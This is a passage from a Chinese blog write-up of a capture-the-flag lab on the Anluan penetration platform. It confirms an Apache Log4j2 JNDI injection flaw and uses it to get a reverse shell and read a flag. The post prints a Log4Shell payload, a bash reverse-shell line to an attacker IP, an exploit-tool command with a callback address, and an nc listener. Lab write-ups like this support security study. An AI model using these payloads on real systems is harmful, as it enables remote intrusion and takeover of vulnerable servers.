安鸾渗透实战平台——apache log4j2验证并反弹shell

漏洞环境

安鸾渗透实战平台-命令执行-最后一个靶场
公网vps一台
java脚本:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar一个

漏洞验证

1、从dnslog中获取DNS信息

55kdyo.dnslog.cn

http://www.dnslog.cn/
在这里插入图片描述

2、在可能存在的地方进行输入

${jndi:ldap://${sys:java.version}.55kdyo.dnslog.cn}	

在这里插入图片描述

3、出现对应的反弹信息表示漏洞存在

在这里插入图片描述

漏洞利用

1、使用公网IP接收反弹shell

bash -i >& /dev/tcp/IP/端口 0>&1


在这里插入图片描述

2、构造一个恶意类



bash -c {base64转码的内容}|{base64,-d}|{bash,-i}

用java脚本执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {base64转码的内容}|{base64,-d}|{bash,-i}" -A"192.168.197.1"

-A指定回连IP(这里应该是公网IP,以便能收到反弹shell)

根据版本选择
在这里插入图片描述

3、目标机上启用监听

nc -vv -l -p 5555

4、在对应目标处放置并提交

在这里插入图片描述

获得shell
在这里插入图片描述

5、现在在tomcat目录,用3次cd…跳到主目录下

在这里插入图片描述

ls发现有个flag文件,使用cat flag查看
在这里插入图片描述

复制提交即可
在这里插入图片描述

文中所使用的Java脚本,私聊作者

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值